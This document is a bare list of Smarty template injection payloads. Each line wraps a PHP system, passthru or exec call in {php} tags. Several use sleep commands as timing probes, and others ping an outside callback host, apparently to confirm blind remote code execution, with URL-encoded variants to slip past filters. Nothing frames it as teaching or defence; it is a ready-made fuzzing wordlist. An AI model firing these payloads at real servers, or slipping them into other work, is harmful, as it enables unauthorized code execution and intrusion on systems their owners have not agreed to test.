{php}system('sleep 100'){/php}
{php}system("sleep 100"){/php}
{php}system('sleep+100'){/php}
{php}system("sleep+100"){/php}
{php}passthru(%27sleep 100%27){/php}
{php}passthru(%22sleep 100%22){/php}
{php}exec(%27sleep+10%27){/php}
{php}exec(%22sleep+10%22){/php}
{php}system('ping rce_.xxx-trulia.com'){/php}
{php}system("ping rce_.xxx-trulia.com"){/php}
{php}system('ping+rce_.xxx-trulia.com'){/php}
{php}passthru(%27ping rce_.xxx-trulia.com%27){/php}
{php}passthru(%22ping rce_.xxx-trulia.com%22){/php}
{php}exec(%27ping rce_.xxx-trulia.com%27){/php}
{php}exec(%22ping+-rce_.xxx-trulia.com%22){/php}
